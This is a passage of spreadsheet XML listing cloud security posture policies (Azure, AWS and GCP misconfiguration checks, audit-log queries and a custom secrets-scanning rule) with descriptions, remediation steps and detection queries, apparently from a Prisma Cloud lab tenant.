      <c r="AG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99" t="inlineStr">
        <is>
          <t>463d8b58-1f01-462c-9e30-eca36d8fa11d</t>
        </is>
      </c>
      <c r="AI99" t="inlineStr">
        <is>
          <t>9aec41df-0e6b-4995-b058-4770b2937e39</t>
        </is>
      </c>
      <c r="AJ99" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK99" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B100" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C100" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D100" t="inlineStr"/>
      <c r="E100" t="inlineStr"/>
      <c r="F100" t="inlineStr"/>
      <c r="G100" t="b">
        <v>0</v>
      </c>
      <c r="H1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00" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J100" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K100" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Resource Manager</t>
        </is>
      </c>
      <c r="L100" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M100" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N100" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O100" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P100" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q100" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R100" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S100" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AZURE_Secure network configuration</t>
        </is>
      </c>
      <c r="T100" t="b">
        <v>0</v>
      </c>
      <c r="U100" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V100" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W100" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has defender setting for Resource Manager (ARM) set to Off. Enabling Azure Defender for ARM provides protection against issues like Suspicious resource management operations, Use of exploitation toolkits, Lateral movement from the Azure management layer to the Azure resources data plane. It is highly recommended to enable Azure Defender for ARM.</t>
        </is>
      </c>
      <c r="X100" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Expand 'Select Defender plan' 
7. Select 'On' status for 'Resource Manager' 
8. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-234
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-234</t>
        </is>
      </c>
      <c r="Y100" t="inlineStr"/>
      <c r="Z100" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any(name equal ignore case Arm and properties.pricingTier does not equal ignore case Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA100" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB100" t="inlineStr">
        <is>
          <t>2024-11-13 09:34:48</t>
        </is>
      </c>
      <c r="AC100" t="inlineStr">
        <is>
          <t>PC-AZR-SC-963-CKV_AZURE_234</t>
        </is>
      </c>
      <c r="AD100" t="b">
        <v>1</v>
      </c>
      <c r="AE100" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF100" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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00" t="inlineStr">
        <is>
          <t>26ae483e-0df3-4721-833a-c2facfb4d2f2</t>
        </is>
      </c>
      <c r="AI100" t="inlineStr">
        <is>
          <t>12d694e1-955b-4cb7-a1d2-44f13d50bf3c</t>
        </is>
      </c>
      <c r="AJ100" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK100" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B101" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C101" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D101" t="inlineStr"/>
      <c r="E101" t="inlineStr"/>
      <c r="F101" t="inlineStr"/>
      <c r="G101" t="b">
        <v>0</v>
      </c>
      <c r="H1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01" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J101" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K101" t="inlineStr">
        <is>
          <t>Network vpc flow records</t>
        </is>
      </c>
      <c r="L101" t="inlineStr"/>
      <c r="M101" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N101" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O101" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P101" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q101" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R101" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S101" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management,Custom</t>
        </is>
      </c>
      <c r="T101" t="b">
        <v>0</v>
      </c>
      <c r="U101" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V101" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W101" t="inlineStr"/>
      <c r="X101" t="inlineStr">
        <is>
          <t>use the aws best practices</t>
        </is>
      </c>
      <c r="Y101" t="inlineStr"/>
      <c r="Z101" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws'</t>
        </is>
      </c>
      <c r="AA101" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB101" t="inlineStr">
        <is>
          <t>2024-01-31 23:39:45</t>
        </is>
      </c>
      <c r="AC101" t="inlineStr"/>
      <c r="AD101" t="b">
        <v>0</v>
      </c>
      <c r="AE101" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF101" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG1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01" t="inlineStr">
        <is>
          <t>6a464d88-a21d-48b3-9c61-ad581b06737f</t>
        </is>
      </c>
      <c r="AI101" t="inlineStr">
        <is>
          <t>39b940d2-65f6-4361-aa37-855976c80a1f</t>
        </is>
      </c>
      <c r="AJ101" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK101" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B102" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C102" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D102" t="inlineStr"/>
      <c r="E102" t="inlineStr"/>
      <c r="F102" t="inlineStr"/>
      <c r="G102" t="b">
        <v>0</v>
      </c>
      <c r="H1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02" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J102" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="K102" t="inlineStr">
        <is>
          <t>Tunde_CSE_Policy1</t>
        </is>
      </c>
      <c r="L102" t="inlineStr"/>
      <c r="M102" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N102" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O102" t="inlineStr">
        <is>
          <t>audit_event</t>
        </is>
      </c>
      <c r="P102" t="inlineStr">
        <is>
          <t>audit</t>
        </is>
      </c>
      <c r="Q102" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R102" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S102" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Logging,Custom</t>
        </is>
      </c>
      <c r="T102" t="b">
        <v>0</v>
      </c>
      <c r="U102" t="inlineStr">
        <is>
          <t>privileged_activity_monitoring</t>
        </is>
      </c>
      <c r="V102" t="inlineStr">
        <is>
          <t>cloud.audit_logs</t>
        </is>
      </c>
      <c r="W102" t="inlineStr"/>
      <c r="X102" t="inlineStr"/>
      <c r="Y102" t="inlineStr"/>
      <c r="Z102" t="inlineStr">
        <is>
          <t>event from cloud.audit_logs where cloud.type = 'aws' AND user = 'root' and IP EXISTS AND operation = 'CreateAccount'</t>
        </is>
      </c>
      <c r="AA102" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB102" t="inlineStr">
        <is>
          <t>2024-09-13 16:59:19</t>
        </is>
      </c>
      <c r="AC102" t="inlineStr"/>
      <c r="AD102" t="b">
        <v>0</v>
      </c>
      <c r="AE102" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF102" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG1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02" t="inlineStr">
        <is>
          <t>8ce1290d-bd0c-4b30-a54e-1682409e803f</t>
        </is>
      </c>
      <c r="AI102" t="inlineStr">
        <is>
          <t>714f64e7-d777-4d29-92e4-7961f2749f9e</t>
        </is>
      </c>
      <c r="AJ102" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK102" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B103" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C103" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D103" t="inlineStr"/>
      <c r="E103" t="inlineStr"/>
      <c r="F103" t="inlineStr"/>
      <c r="G103" t="b">
        <v>0</v>
      </c>
      <c r="H1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03" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J103" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K103" t="inlineStr">
        <is>
          <t>GCP Cloud Function has risky basic role assigned</t>
        </is>
      </c>
      <c r="L103" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M103" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N103" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O103" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P103" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q103" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R103" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S103" t="inlineStr">
        <is>
          <t>Attack Path Rule,Awesome_Standard,AW_GCP_Secure access management</t>
        </is>
      </c>
      <c r="T103" t="b">
        <v>0</v>
      </c>
      <c r="U103" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V103" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W103" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions configured with the risky basic role. Basic roles are highly permissive roles that existed prior to the introduction of IAM and grant wide access over project to the grantee. To reduce the blast radius and defend against privilege escalations if the Cloud Function is compromised, it is recommended to follow the principle of least privilege and avoid use of basic roles.</t>
        </is>
      </c>
      <c r="X103" t="inlineStr">
        <is>
          <t>It is recommended to the principle of least privilege for granting access.
To assign desired service account to the cloud funtion, please refer to the URL given below:
https://cloud.google.com/functions/docs/securing/function-identity#individual
To update priviledges granted to a service account, please refer to the URL given below:
https://cloud.google.com/iam/docs/granting-changing-revoking-access</t>
        </is>
      </c>
      <c r="Y103" t="inlineStr"/>
      <c r="Z103" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = roles[*] contains "roles/editor" or roles[*] contains "roles/owner" as X; config from cloud.resource where api.name = 'gcloud-cloud-function' as Y; filter '$.Y.serviceAccountEmail equals $.X.user'; show Y;</t>
        </is>
      </c>
      <c r="AA103" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB103" t="inlineStr">
        <is>
          <t>2024-11-13 09:34:50</t>
        </is>
      </c>
      <c r="AC103" t="inlineStr">
        <is>
          <t>PC-GCP-RM-1060</t>
        </is>
      </c>
      <c r="AD103" t="b">
        <v>1</v>
      </c>
      <c r="AE103" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF103" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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03" t="inlineStr">
        <is>
          <t>95a9e34b-0274-42b8-89cc-8f3dbb3e0ea8</t>
        </is>
      </c>
      <c r="AI103" t="inlineStr">
        <is>
          <t>56159411-7796-49a4-8217-14fafc3634a2</t>
        </is>
      </c>
      <c r="AJ103" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK103" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" t="inlineStr"/>
      <c r="B104" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C104" s="2" t="inlineStr"/>
      <c r="D104" t="inlineStr"/>
      <c r="E104" t="inlineStr"/>
      <c r="F104" t="inlineStr"/>
      <c r="G104" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J104" t="inlineStr"/>
      <c r="K104" t="inlineStr">
        <is>
          <t>Sara Custom: Attack Path 1</t>
        </is>
      </c>
      <c r="L104" t="inlineStr"/>
      <c r="M104" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N104" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O104" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P104" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q104" t="inlineStr"/>
      <c r="R104" t="inlineStr"/>
      <c r="S104" t="inlineStr"/>
      <c r="T104" t="b">
        <v>0</v>
      </c>
      <c r="U104" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V104" t="inlineStr"/>
      <c r="W104" t="inlineStr"/>
      <c r="X104" t="inlineStr">
        <is>
          <t>Control network access to cluster API server endpoint using XSOAR integration and playbook</t>
        </is>
      </c>
      <c r="Y104" t="inlineStr"/>
      <c r="Z104" t="inlineStr"/>
      <c r="AA104" t="inlineStr">
        <is>
          <t>Sara Costa</t>
        </is>
      </c>
      <c r="AB104" t="inlineStr">
        <is>
          <t>2024-11-11 19:15:50</t>
        </is>
      </c>
      <c r="AC104" t="inlineStr"/>
      <c r="AD104" t="b">
        <v>0</v>
      </c>
      <c r="AE104" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF104" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>e0753fda-e31d-45da-b244-4295904e92c0</t>
        </is>
      </c>
      <c r="AI104" t="inlineStr"/>
      <c r="AJ104" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK104" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" t="inlineStr"/>
      <c r="B105" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C105" s="2" t="inlineStr"/>
      <c r="D105" t="inlineStr"/>
      <c r="E105" t="inlineStr"/>
      <c r="F105" t="inlineStr"/>
      <c r="G105" t="b">
        <v>0</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J105" t="inlineStr"/>
      <c r="K105" t="inlineStr">
        <is>
          <t>test12324</t>
        </is>
      </c>
      <c r="L105" t="inlineStr"/>
      <c r="M105" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N105" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O105" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P105" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q105" t="inlineStr"/>
      <c r="R105" t="inlineStr"/>
      <c r="S105" t="inlineStr"/>
      <c r="T105" t="b">
        <v>0</v>
      </c>
      <c r="U105" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V105" t="inlineStr"/>
      <c r="W105" t="inlineStr"/>
      <c r="X105" t="inlineStr"/>
      <c r="Y105" t="inlineStr"/>
      <c r="Z105" t="inlineStr">
        <is>
          <t>{"category":"Licenses","conditionQuery":{"cond_type":"licenses","value":["Adobe-2006"]}}</t>
        </is>
      </c>
      <c r="AA105" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB105" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC105" t="inlineStr"/>
      <c r="AD105" t="b">
        <v>0</v>
      </c>
      <c r="AE105" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF105" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>acac269d-f065-4478-83df-53120b96a040</t>
        </is>
      </c>
      <c r="AI105" t="inlineStr"/>
      <c r="AJ105" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK105" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" t="inlineStr"/>
      <c r="B106" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C106" s="2" t="inlineStr"/>
      <c r="D106" t="inlineStr"/>
      <c r="E106" t="inlineStr"/>
      <c r="F106" t="inlineStr"/>
      <c r="G106" t="b">
        <v>0</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J106" t="inlineStr"/>
      <c r="K106" t="inlineStr">
        <is>
          <t>CM Test Secret Policy</t>
        </is>
      </c>
      <c r="L106" t="inlineStr"/>
      <c r="M106" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N106" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O106" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P106" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q106" t="inlineStr"/>
      <c r="R106" t="inlineStr"/>
      <c r="S106" t="inlineStr">
        <is>
          <t>Custom</t>
        </is>
      </c>
      <c r="T106" t="b">
        <v>0</v>
      </c>
      <c r="U106" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V106" t="inlineStr"/>
      <c r="W106" t="inlineStr"/>
      <c r="X106" t="inlineStr"/>
      <c r="Y106" t="inlineStr"/>
      <c r="Z106" t="inlineStr">
        <is>
          <t>---
metadata:
  severity: "critical"
  name: "CM Test Secret Policy"
  guidelines: "..."
  category: "secrets"
definition:
  cond_type: "secrets"
  value:
    - (?:AWS_ACCESS_KEY_ID)</t>
        </is>
      </c>
      <c r="AA106" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB106" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:29</t>
        </is>
      </c>
      <c r="AC106" t="inlineStr"/>
      <c r="AD106" t="b">
        <v>0</v>
      </c>
      <c r="AE106" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF106" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>fe6bf32c-9ec6-4b14-9b5f-d5c0970636ed</t>
        </is>
      </c>
      <c r="AI106" t="inlineStr"/>
      <c r="AJ106" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK106" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B107" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C107" s="2" t="inlineStr"/>
      <c r="D107" t="inlineStr"/>
      <c r="E107" t="inlineStr"/>
      <c r="F107" t="inlineStr"/>
      <c r="G107" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J107" t="inlineStr"/>
      <c r="K107" t="inlineStr">
        <is>
          <t>S3 Bucket ACL where a log delivery-WRITE is not recommended</t>
        </is>
      </c>
      <c r="L107" t="inlineStr"/>
      <c r="M107" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N107" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O107" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P107" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q107" t="inlineStr">
        <is>
          <t>Storage</t>
        </is>
      </c>
      <c r="R107" t="inlineStr">
        <is>
          <t>2.1.1</t>
        </is>
      </c>
      <c r="S107" t="inlineStr"/>
      <c r="T107" t="b">
        <v>0</v>
      </c>
      <c r="U107" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V107" t="inlineStr"/>
      <c r="W107" t="inlineStr">
        <is>
          <t>The log Delivery group gets WRITE and READ_ACP permission on the bucket; thus cloud allows access to sensitive data.</t>
        </is>
      </c>
      <c r="X107" t="inlineStr"/>
      <c r="Y107" t="inlineStr"/>
      <c r="Z107" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "S3 Bucket ACL where a log delivery-WRITE is not recommended"
  severity: "high"
  guidelines: "The log Delivery group gets WRITE and READ_ACP permission on the bucket; thus cloud allows access to sensitive data."
  category: "storage" #choose one: "general"/"iam"/"kubernetes"/"monitoring"/"networking"/"public"/"secrets"/"storage"/"sast"
scope:
  provider: "aws" #provider is required for IaC policies. choose one: "alibaba_cloud"/"aws"/"azure"/"gcp"/"oci"
definition:
  cond_type: "attribute"
  resource_types: "aws_s3_bucket"
  attribute: "acl"
  operator: "not_equals"
  value: "log-delivery-write"</t>
        </is>
      </c>
      <c r="AA107" t="inlineStr">
        <is>
          <t>Carlos Martins Jr.</t>
        </is>
      </c>
      <c r="AB107" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC107" t="inlineStr"/>
      <c r="AD107" t="b">
        <v>0</v>
      </c>
      <c r="AE107" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF107" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>68fb0b10-adae-444f-a391-111c5c03351a</t>
        </is>
      </c>
      <c r="AI107" t="inlineStr"/>
      <c r="AJ107" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK107" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B108" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C108" s="2" t="inlineStr"/>
      <c r="D108" t="inlineStr"/>
      <c r="E108" t="inlineStr"/>
      <c r="F108" t="inlineStr"/>
      <c r="G108" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J108" t="inlineStr"/>
      <c r="K108" t="inlineStr">
        <is>
          <t>AZURE Test policy 4</t>
        </is>
      </c>
      <c r="L108" t="inlineStr"/>
      <c r="M108" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N108" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O108" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P108" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q108" t="inlineStr">
        <is>
          <t>Data Protection (DP)</t>
        </is>
      </c>
      <c r="R108" t="inlineStr">
        <is>
          <t>DP-2</t>
        </is>
      </c>
      <c r="S108" t="inlineStr">
        <is>
          <t>AW_AZURE_DP-2,Custom,Azure_Security_Benchmark_(v2)</t>
        </is>
      </c>
      <c r="T108" t="b">
        <v>0</v>
      </c>
      <c r="U108" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V108" t="inlineStr"/>
      <c r="W108" t="inlineStr"/>
      <c r="X108" t="inlineStr"/>
      <c r="Y108" t="inlineStr"/>
      <c r="Z108" t="inlineStr"/>
      <c r="AA108" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB108" t="inlineStr">
        <is>
          <t>2024-11-13 18:32:43</t>
        </is>
      </c>
      <c r="AC108" t="inlineStr"/>
      <c r="AD108" t="b">
        <v>0</v>
      </c>
      <c r="AE108" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF108" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>27d50103-298b-473c-b649-c95f0bd46e03</t>
        </is>
      </c>
      <c r="AI108" t="inlineStr"/>
      <c r="AJ108" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK108" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2)</t>
        </is>
      </c>
      <c r="B109" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C109" s="2" t="inlineStr"/>
      <c r="D109" t="inlineStr"/>
      <c r="E109" t="inlineStr"/>
      <c r="F109" t="inlineStr"/>
      <c r="G109" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J109" t="inlineStr"/>
      <c r="K109" t="inlineStr">
        <is>
          <t>AZURE Pramm-azure-automation-account</t>
        </is>
      </c>
      <c r="L109" t="inlineStr"/>
      <c r="M109" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N109" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O109" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P109" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q109" t="inlineStr">
        <is>
          <t>Network security (NS)</t>
        </is>
      </c>
      <c r="R109" t="inlineStr">
        <is>
          <t>NS-7</t>
        </is>
      </c>
      <c r="S109" t="inlineStr">
        <is>
          <t>Pramm-azure-policy,Custom,Azure_Security_Benchmark_(v2),AW_AZURE_NS-7</t>
        </is>
      </c>
      <c r="T109" t="b">
        <v>0</v>
      </c>
      <c r="U109" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V109" t="inlineStr"/>
      <c r="W109" t="inlineStr"/>
      <c r="X109" t="inlineStr"/>
      <c r="Y109" t="inlineStr"/>
      <c r="Z109" t="inlineStr"/>
      <c r="AA109" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB109" t="inlineStr">
        <is>
          <t>2024-11-13 18:32:41</t>
        </is>
      </c>
      <c r="AC109" t="inlineStr"/>
      <c r="AD109" t="b">
        <v>0</v>
      </c>
      <c r="AE109" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF109" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
